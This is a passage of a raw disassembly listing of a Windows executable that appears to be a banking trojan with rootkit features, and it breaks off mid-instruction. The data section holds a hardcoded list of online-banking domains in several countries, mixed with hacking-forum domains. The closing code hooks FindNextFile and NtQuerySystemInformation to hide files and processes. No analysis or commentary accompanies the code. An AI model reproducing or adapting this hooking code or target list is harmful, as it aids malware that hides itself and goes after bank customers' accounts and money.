dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407CB4 proc near ; CODE XREF: sub_4068A8+11Cp jmp ds:dword_4264A4 sub_407CB4 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407CC0 proc near ; CODE XREF: sub_4068A8+58Bp jmp ds:dword_4264A8 sub_407CC0 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407CCC proc near ; CODE XREF: sub_4067EE+AEp jmp ds:dword_4264AC sub_407CCC endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407CD8 proc near ; CODE XREF: sub_406344+29Dp jmp ds:dword_4264B8 sub_407CD8 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407CE4 proc near ; CODE XREF: sub_4068A8+1F4p jmp ds:dword_4264BC sub_407CE4 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407CF0 proc near ; CODE XREF: sub_4068A8+1DBp ; sub_4068A8+1E7p jmp ds:dword_4264C0 sub_407CF0 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407CFC proc near ; CODE XREF: sub_4068A8+20Ep jmp ds:dword_4264C4 sub_407CFC endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407D08 proc near ; CODE XREF: sub_40553F+128p ; sub_40553F+447p jmp ds:dword_4264C8 sub_407D08 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407D14 proc near ; CODE XREF: sub_4033E8+26p jmp ds:dword_4264D4 sub_407D14 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407D20 proc near ; CODE XREF: sub_4033E8+4Ep jmp ds:dword_4264D8 sub_407D20 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407D2C proc near ; CODE XREF: sub_401379+21p ; sub_402AAB+2Fp jmp ds:dword_4264DC sub_407D2C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407D38 proc near ; CODE XREF: sub_401326+40p ; sub_401379+4Bp ... jmp ds:dword_4264E0 sub_407D38 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407D44 proc near ; CODE XREF: sub_401326+16p jmp ds:dword_4264E4 sub_407D44 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407D50 proc near ; CODE XREF: sub_401326+36p jmp ds:dword_4264E8 sub_407D50 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407D5C proc near ; CODE XREF: sub_401379+41p ; sub_402AAB+51p jmp ds:dword_4264EC sub_407D5C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407D68 proc near ; CODE XREF: sub_401A00+9Dp jmp ds:dword_4264F0 sub_407D68 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407D74 proc near ; CODE XREF: sub_401A00+C4p jmp ds:dword_4264F4 sub_407D74 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407D80 proc near ; CODE XREF: sub_401A00+AFp jmp ds:dword_4264F8 sub_407D80 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407D8C proc near ; CODE XREF: sub_4032E2+Fp jmp ds:dword_4264FC sub_407D8C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407D98 proc near ; CODE XREF: sub_4032E2+DEp jmp ds:dword_426500 sub_407D98 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407DA4 proc near ; CODE XREF: sub_4032E2+19p jmp ds:dword_426504 sub_407DA4 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407DB0 proc near ; CODE XREF: sub_402578+15p jmp ds:dword_426510 sub_407DB0 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407DBC proc near ; CODE XREF: sub_401219+49p jmp ds:dword_426514 sub_407DBC endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407DC8 proc near ; CODE XREF: sub_404211+E7p ; sub_4043B0+47p ... jmp ds:dword_426518 sub_407DC8 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407DD4 proc near ; CODE XREF: sub_4034AD+93p ; sub_4034AD+DFp jmp ds:dword_42651C sub_407DD4 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407DE0 proc near ; CODE XREF: sub_405AAC+7A1p ; sub_405AAC+7BEp jmp ds:dword_426520 sub_407DE0 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407DEC proc near ; CODE XREF: sub_401219+74p ; sub_405AAC+75Bp ... jmp ds:dword_426524 sub_407DEC endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407DF8 proc near ; CODE XREF: sub_405350+A2p jmp ds:dword_426528 sub_407DF8 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407E04 proc near ; CODE XREF: sub_401565+1Ep ; .text:00404FBEp ... jmp ds:dword_42652C sub_407E04 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407E10 proc near ; CODE XREF: sub_403D8E+32p ; sub_403D8E+13Ap ... jmp ds:dword_426530 sub_407E10 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407E1C proc near ; CODE XREF: sub_40109A+149p jmp ds:dword_426534 sub_407E1C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407E28 proc near ; CODE XREF: sub_4013E4:loc_4013F1p ; sub_40284A+Cp ... jmp ds:dword_426538 sub_407E28 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407E34 proc near ; CODE XREF: sub_40109A+102p ; sub_40109A+11Cp ... jmp ds:dword_42653C sub_407E34 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407E40 proc near ; CODE XREF: sub_402638+13p ; .text:00402695p ... jmp ds:dword_426540 sub_407E40 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407E4C proc near ; CODE XREF: sub_405AAC+16p ; sub_406344+A0p jmp ds:dword_426544 sub_407E4C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407E58 proc near ; CODE XREF: sub_405AAC+5A5p jmp ds:dword_426548 sub_407E58 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407E64 proc near ; CODE XREF: sub_4024E0+24p ; sub_40251A+25p ... jmp ds:dword_42654C sub_407E64 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407E70 proc near ; CODE XREF: sub_407868+17p jmp ds:dword_426550 sub_407E70 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407E7C proc near ; CODE XREF: sub_403D8E+2C8p jmp ds:dword_426554 sub_407E7C endp ; --------------------------------------------------------------------------- align 200h _text ends ; Section 2. (virtual address 00008000) ; Virtual size : 00011378 ( 70520.) ; Section size in file : 00011378 ( 70520.) ; Offset to raw data for section: 00008000 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _bss segment para public 'DATA' use32 assume cs:_bss ;org 408000h dword_408000 dd 0 ; sub_4067EE+8Br ... dword_408004 dd 0 ; sub_4015EC+3A9w ... align 10h dword_408010 dd 40h dup(0) ; sub_405AAC+3C0o ... dword_408110 dd 0 ; sub_4015EC+1DAw ... dword_408114 dd 0 ; sub_4015EC+34Fr ... dword_408118 dd 0 ; sub_404DE5+1Ar ... byte_40811C db 0 ; DATA XREF: sub_4015EC+FBw align 10h dword_408120 dd 40h dup(0) ; sub_406344+21Eo ... dword_408220 dd 0 ; sub_401EAF+CBw ... dd 0FEh dup(0) dword_40861C dd 0 ; sub_40553F+473r ... dword_408620 dd 0 dd 0FEh dup(0) dword_408A1C dd 0 ; sub_4067EE+99r dword_408A20 dd 0 ; sub_40553F+4A3r ... align 8 byte_408A28 db 0 ; DATA XREF: sub_4015EC+357w align 10h byte_408A30 db 0 ; DATA XREF: sub_4015EC+47w ; sub_4015EC+4Cr ... align 4 dword_408A34 dd 0 ; sub_4015EC+184w ... align 10h dword_408A40 dd 40h dup(0) ; sub_405AAC+53Co ... dword_408B40 dd 0 ; sub_401EAF+B9r ... dd 0FFh dup(0) dword_408F40 dd 94h ; sub_406344+81o dd 5, 1, 0A28h dword_408F50 dd 2 aServicePack2 db 'Service Pack 2',0 align 4 dd 1Ch dup(0) byte_408FD4 db 0 ; DATA XREF: sub_4015EC+31Ew ; sub_4015EC+323r align 4 dword_408FD8 dd 0 ; sub_4015EC+B3r ... dword_408FDC dd 0 dword_408FE0 dd 0 ; sub_401A00+82r ... dword_408FE4 dd 0 ; sub_406344+471r ... dword_408FE8 dd 0 ; sub_40553F+134r dword_408FEC dd 0 ; sub_4068A8+572r dword_408FF0 dd 0 ; sub_401B2E+8r dword_408FF4 dd 0 ; sub_4015EC:loc_401659w ... dword_408FF8 dd 0 ; sub_40553F+483r ... dword_408FFC dd 0 ; sub_4067EE+7Dr dword_409000 dd 0 ; sub_40553F+20Cr ... dword_409004 dd 0 ; sub_401AE9+3Ar dword_409008 dd 400000h ; sub_40553F+8Br ... dword_40900C dd 0 ; sub_4015EC+8Fw ... dword_409010 dd 0 ; sub_4067EE+6Fr align 10h dword_409020 dd 40h dup(0) ; sub_406344+205o ... byte_409120 db 0 ; DATA XREF: sub_4015EC+13Dw align 4 dword_409124 dd 0 ; sub_40553F+CFr ... align 10h byte_409130 db 0 ; DATA XREF: sub_4043B0+CAo ; sub_404BA0+5Bo ... byte_409131 db 0 ; DATA XREF: sub_404BA0+176r byte_409132 db 0 ; DATA XREF: sub_404BA0+17Fr byte_409133 db 0 ; DATA XREF: sub_404BA0+188r dd 3FFFh dup(0) byte_419130 db 0 ; DATA XREF: sub_4015EC+223w ; sub_4015EC+228r align 4 dword_419134 dd 0 ; .text:loc_404F92r ... dword_419138 dd 0 dword_41913C dd 0 ; sub_401A00+11r dword_419140 dd 0 ; sub_40553F+149r ... byte_419144 db 0 ; DATA XREF: sub_4015EC+2A0w ; sub_4015EC+2A5r ... align 4 dword_419148 dd 0 ; sub_40553F+493r ... dword_41914C dd 0 ; sub_4068A8+1A9r ... dword_419150 dd 0 ; sub_40553F+1D7r ... align 10h aCWindowsSystem db 'C:\WINDOWS\system32',0 ; DATA XREF: sub_402784+1Do ; sub_40284A+180o ... dd 3Bh dup(0) byte_419260 db 0 ; DATA XREF: sub_40129C+58o ; sub_404FCE+CDw ... align 4 dd 3Fh dup(0) dword_419360 dd 0 ; sub_40553F+4B3r ... dword_419364 dd 0 ; sub_40553F+4C3r dword_419368 dd 0 ; sub_4068A8+1B1r ... align 10h byte_419370 db 0 ; DATA XREF: sub_4015EC+385w align 8 _bss ends ; Section 3. (virtual address 0001A000) ; Virtual size : 0000C000 ( 49152.) ; Section size in file : 0000C000 ( 49152.) ; Offset to raw data for section: 0001A000 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _data segment para public 'DATA' use32 assume cs:_data ;org 41A000h dd offset dword_408000 dd 419378h, 8000h, 0 dword_41A010 dd 0 ; sub_40109A+110w ... dword_41A014 dd 12FF74h dd 0 dword_41A01C dd 0 dword_41A020 dd 1 ; sub_401219+5Ar dword_41A024 dd 14B018h ; sub_401219+54r dword_41A028 dd 1471D8h ; sub_401219+4Er dword_41A02C dd 0 ; sub_40109A:loc_401208r dword_41A030 dd 0 dword_41A034 dd 0 ; sub_40109A+87r ... dword_41A038 dd 0 dword_41A03C dd 14h dup(0) ; sub_40109A+8Fo dword_41A08C dd 0 dword_41A090 dd 0 ; sub_40109A+32w aKkqhook_28 db 'KKQHOOK_28',0 ; DATA XREF: sub_406316+5o ; sub_406344+2ECo align 10h dword_41A0A0 dd 0 ; sub_405AAC+78r ... dword_41A0A4 dd 46h ; sub_405AAC+7D6r ... off_41A0A8 dd offset aSiliconfirewar ; DATA XREF: sub_405AAC+59r ; sub_405AAC+7Er ; "siliconfireware.ru" dd offset aAtmacasoft_com ; "atmacasoft.com" dd offset aProdexteam_net ; "prodexteam.net" dd offset aProdexteam_n_0 ; "prodexteam.net/main.htm" dd offset aWww_cbr_ru ; "www.cbr.ru" dd offset aWww_proxySocks ; "www.proxy-socks.net" dd offset aProdexteam_n_1 ; "prodexteam.netcrutop.nu" dd offset aNew_egg_com ; "new.egg.com" dd offset aWww_baltbank_r ; "www.baltbank.ru" dd offset aWelcome3_smile ; "welcome3.smile.co.uk" dd offset aOlb2_nationet_ ; "olb2.nationet.com" dd offset aWww_bbin_ru ; "www.bbin.ru" dd offset aMasterX_com ; "master-x.com" dd offset aEbookfinaltras ; "ebookfinaltrash.ru" dd offset aWww_masterbank ; "www.masterbank.ru" dd offset aWww_bankBanque ; "www.bank-banque-canada.ca/index.php" dd offset aWww_bmo_com ; "www.bmo.com" dd offset aWww_bankofmadu ; "www.bankofmadura.com" dd offset aWww_cibc_com ; "www.cibc.com" dd offset aWww_vtb_ru ; "www.vtb.ru" dd offset aWww_cwbank_com ; "www.cwbank.com" dd offset aHyperSpaceFuel ; "hyper-space-fuel.ru" dd offset aAlfabank_ru ; "alfabank.ru" dd offset aCrutop_nuVbull ; "crutop.nu/vbulletin/" dd offset aWww_mmbank_ru ; "www.mmbank.ru" dd offset aCrutop_nuVbu_0 ; "crutop.nu/vbulletin/forumdisplay.php" dd offset aWww_uniastrum_ ; "www.uniastrum.ru" dd offset aCrutop_nuVbu_1 ; "crutop.nu/vbulletin/showthread.php" dd offset aAtmacasoft_com ; "atmacasoft.com" dd offset aAsmworm_com ; "asmworm.com" dd offset aWww_proxySocks ; "www.proxy-socks.net" dd offset aDigitalRelaxkg ; "digital-relaxkgb.ru" dd offset aWww_worldbank_ ; "www.worldbank.org/index.php" dd offset aWww_candidatev ; "www.candidateverifier.com/index.php" dd offset aWww_sbrf_ru ; "www.sbrf.ru" dd offset aPizdabolInc_ru ; "pizdabol-inc.ru" dd offset aWww_bankofindi ; "www.bankofindia.com" dd offset aWww_icbank_ru ; "www.icbank.ru" dd offset aAcroleinHawk_r ; "acrolein-hawk.rubanking.halifax-online."... dd offset aWww_spyinstruc ; "www.spyinstructors.com" dd offset aWww_kmb_ru ; "www.kmb.ru" dd offset aWww_netmagiste ; "www.netmagister.com" dd offset aWww_nomos_ru ; "www.nomos.ru" dd offset aWww_absolutban ; "www.absolutbank.ru" dd offset aMyonlineaccoun ; "myonlineaccounts2.abbeynational.co.uk" dd offset aOnlineBusiness ; "online-business.lloydstsb.co.uk" dd offset aWww_allahabadb ; "www.allahabadbank.com" dd offset aMasterX_comFor ; "master-x.com/forum/" dd offset aWww_rbc_com ; "www.rbc.com" dd offset aWww_ovk_ru ; "www.ovk.ru" dd offset aWww1_hsbc_caIn ; "www1.hsbc.ca/index.php" dd offset aProrat_net ; "prorat.net" dd offset aYambo_biz ; "yambo.biz" dd offset aKidosBank_ru ; "kidos-bank.ru" dd offset aWww_lbcdirect_ ; "www.lbcdirect.laurentianbank.ca/index.p"... dd offset aBarclays_com ; "barclays.com" dd offset aTotallyfreeban ; "totallyfreebanking.com" dd offset aWww_nbc_caInde ; "www.nbc.ca/index.php" dd offset a53bank_com ; "53bank.com" dd offset aWww_uralsib_ru ; "www.uralsib.ru" dd offset aGrepwareFacili ; "grepware-facility.ru" dd offset aWww_b2bTrust_c ; "www.b2b-trust.com" dd offset aGutabank_ru ; "gutabank.ru" dd offset aOpenbank_com ; "openbank.com" dd offset aSeclab_ru ; "seclab.ru" dd offset aTatNeftbank_ru ; "tat-neftbank.ru" dd offset aSecuritylab_ru ; "securitylab.ru" dd offset aRoyalbank_com ; "royalbank.com" dd offset aFethard_biz ; "fethard.biz" dd offset aWww_mdmbank_ru ; "www.mdmbank.ru" dd offset aGronxplanets_r ; "gronxplanets.ru" dd offset aChevychasebank ; "chevychasebank.com" aSoftwareMicr_4 db 'Software\Microsoft\Windows',0 ; DATA XREF: sub_405AAC+2ECo ; sub_405AAC+356o ... aOfstkkq db 'ofstkkq',0 ; DATA XREF: sub_405AAC+2E7o ; sub_405AAC+351o aOfstkkqc db 'ofstkkqc',0 ; DATA XREF: sub_405AAC+39Ao ; sub_405AAC+498o dword_41A1F4 dd 0 ; sub_4068A8:loc_4069C9r ... dword_41A1F8 dd 0 ; sub_4068A8+67r ... dword_41A1FC dd 3Bh ; sub_4015EC+79w ... off_41A200 dd offset loc_401659 ; DATA XREF: sub_4015EC+66r dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401696 dd offset loc_401696 dd offset loc_401874 dd offset loc_401874 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401696 dd offset loc_401696 dd offset loc_401874 dd offset loc_401803 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401696 dd offset loc_401696 dd offset loc_401874 dd offset loc_401874 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401696 dd offset loc_401696 dd offset loc_401874 dd offset loc_401874 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401696 dd offset loc_401696 dd offset loc_4016CB dd offset loc_401874 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401696 dd offset loc_401696 dd offset loc_4016CB dd offset loc_401874 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401696 dd offset loc_401696 dd offset loc_4016CB dd offset loc_401874 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401696 dd offset loc_401696 dd offset loc_4016CB dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401659 dd offset loc_401659 dd offset loc_4016CB dd offset loc_4016CB dd offset loc_401733 dd offset loc_401759 dd offset loc_4017D1 dd offset loc_401797 dd offset loc_4016BA dd offset loc_401785 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_401785 dd offset loc_401797 dd offset loc_401785 dd offset loc_401785 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 off_41A430 dd offset loc_401659 ; DATA XREF: sub_4015EC+24Dr dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_4017AE dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_4017C1 dd offset loc_4017C1 dd offset loc_4017C1 dd offset loc_4017C1 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_4016BA dd offset loc_4017D1 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4017D1 dd offset loc_4017D1 dd offset loc_4017D1 dd offset loc_4017D1 dd offset loc_4017D1 dd offset loc_4017D1 dd offset loc_4017D1 dd offset loc_4017D1 dd offset loc_401785 dd offset loc_401785 dd offset loc_4017E7 dd offset loc_401874 dd offset loc_401659 dd offset loc_401659 dd offset loc_401785 dd offset loc_401797 dd offset loc_4017F3 dd offset loc_401874 dd offset loc_4017E7 dd offset loc_401874 dd offset loc_401874 dd offset loc_40166B dd offset loc_401874 dd offset loc_401874 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_4016BA dd offset loc_4016BA dd offset loc_401874 dd offset loc_401874 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_401659 dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4016BA dd offset loc_4017D1 dd offset loc_4017D1 dd offset loc_4017AE dd offset loc_4016BA dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_4016F1 dd offset loc_4017FC dd offset loc_40170D dd offset loc_40170D dd offset loc_401874 dd offset loc_401874 dd offset loc_401686 dd offset loc_401686 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401659 dd offset loc_401659 off_41A600 dd offset loc_401840 ; DATA XREF: sub_4015EC+238r dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_40186D dd offset loc_40186D dd offset loc_401874 dd offset loc_40186D dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401851 dd offset loc_401851 dd offset loc_401851 dd offset loc_401851 dd offset loc_401851 dd offset loc_401851 dd offset loc_401851 dd offset loc_401851 dd offset loc_401851 dd offset loc_401851 dd offset loc_401851 dd offset loc_401851 dd offset loc_401851 dd offset loc_401851 dd offset loc_401851 dd offset loc_401851 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401840 dd offset loc_40185E dd offset loc_401840 dd offset loc_40186D dd offset loc_40186D dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401840 dd offset loc_40185E dd offset loc_401840 dd offset loc_40186D dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_40186D dd offset loc_40186D dd offset loc_40185E dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_401840 dd offset loc_40186D dd offset loc_40186D dd offset loc_40186D dd offset loc_40186D dd offset loc_40186D dd offset loc_40186D dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 dd offset loc_401874 aFindnextfilea db 'FindNextFileA',0 ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 18h mov [esp+8], edi mov [esp+4], esi mov [esp], ebx loc_41A78F: ; CODE XREF: .data:0041A7D8j push dword ptr [ebp+0Ch] push dword ptr [ebp+8] call near ptr 243A99Ch test eax, eax jz short loc_41A7DA pusha mov eax, [ebp+0Ch] add eax, 2Ch mov ebx, eax loc_41A7A9: ; CODE XREF: .data:0041A7AFj cmp byte ptr [ebx], 0 jz short loc_41A7B1 inc ebx jmp short loc_41A7A9 ; --------------------------------------------------------------------------- loc_41A7B1: ; CODE XREF: .data:0041A7ACj mov word ptr [ebx], 463Ah inc ebx inc ebx push dword ptr [ebx] mov word ptr [ebx], 0 push ebx push eax call near ptr 0C4DB3D2h pop ebx pop dword ptr [ebx] mov word ptr [ebx-2], 0 test ax, ax jnz short loc_41A7D7 popa jmp short loc_41A7DA ; --------------------------------------------------------------------------- loc_41A7D7: ; CODE XREF: .data:0041A7D2j popa jmp short loc_41A78F ; --------------------------------------------------------------------------- loc_41A7DA: ; CODE XREF: .data:0041A79Cj ; .data:0041A7D5j mov ebx, [esp] mov esi, [esp+4] mov edi, [esp+8] mov esp, ebp pop ebp retn 8 ; --------------------------------------------------------------------------- db 0FFh dd 0FFFFFFFFh, 6E694600h, 78654E64h, 6C694674h db 65h, 57h, 0 ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 18h mov [esp+8], edi mov [esp+4], esi mov [esp], ebx loc_41A810: ; CODE XREF: .data:0041A85Fj push dword ptr [ebp+0Ch] push dword ptr [ebp+8] call near ptr 243AA1Dh test eax, eax jz short loc_41A861 pusha mov eax, [ebp+0Ch] add eax, 2Ch mov ebx, eax loc_41A82A: ; CODE XREF: .data:0041A832j cmp word ptr [ebx], 0 jz short loc_41A834 inc ebx inc ebx jmp short loc_41A82A ; --------------------------------------------------------------------------- loc_41A834: ; CODE XREF: .data:0041A82Ej mov dword ptr [ebx], 46003Ah add ebx, 4 push dword ptr [ebx] mov dword ptr [ebx], 0 push ebx push eax call near ptr 0D4EB559h pop ebx pop dword ptr [ebx] mov dword ptr [ebx-4], 0 test ax, ax jnz short loc_41A85E popa jmp short loc_41A861 ; --------------------------------------------------------------------------- loc_41A85E: ; CODE XREF: .data:0041A859j popa jmp short loc_41A810 ; --------------------------------------------------------------------------- loc_41A861: ; CODE XREF: .data:0041A81Dj ; .data:0041A85Cj mov ebx, [esp] mov esi, [esp+4] mov edi, [esp+8] mov esp, ebp pop ebp retn 8 ; --------------------------------------------------------------------------- dw 0FFFFh dword_41A874 dd 0FFFFFFh, 7551744Eh, 53797265h, 65747379h, 666E496Dh ; DATA XREF: .data:0041ADC0o dd 616D726Fh, 6E6F6974h db 0 ; --------------------------------------------------------------------------- loc_41A891: ; DATA XREF: .data:0041ADC8o push ebp mov ebp, esp sub esp, 24h mov [esp+8], edi mov [esp+4], esi mov [esp], ebx sub esp, 10h mov eax, [ebp+14h] mov edi, [ebp+10h] mov ebx, [ebp+0Ch] mov [esp+0Ch], eax mov [esp+8], edi mov [esp+4], ebx mov esi, [ebp+8] mov [esp], esi call near ptr 243AAC7h mov [ebp-4], eax cmp esi, 5 jz short loc_41A8E1 loc_41A8CD: ; CODE XREF: .data:0041A8E7j ; .data:0041A93Aj mov eax, [ebp-4] mov ebx, [esp] mov esi, [esp+4] mov edi, [esp+8] mov esp, ebp pop ebp retn 10h ; --------------------------------------------------------------------------- loc_41A8E1: ; CODE XREF: .data:0041A8CBj cmp edi, 1F40h jle short loc_41A8CD jmp short loc_41A8EF ; --------------------------------------------------------------------------- loc_41A8EB: ; CODE XREF: .data:0041A93Cj mov esi, ebx loc_41A8ED: ; CODE XREF: .data:0041A934j add ebx, eax loc_41A8EF: ; CODE XREF: .data:0041A8E9j pusha mov eax, [ebx+44h] push 50h sub esp, 20h xor ebx, ebx loc_41A8FD: ; CODE XREF: .data:0041A910j bt eax, ebx jb short loc_41A908 mov byte ptr [esp+ebx], 30h jmp short loc_41A90C ; --------------------------------------------------------------------------- loc_41A908: ; CODE XREF: .data:0041A900j mov byte ptr [esp+ebx], 31h loc_41A90C: ; CODE XREF: .data:0041A906j inc 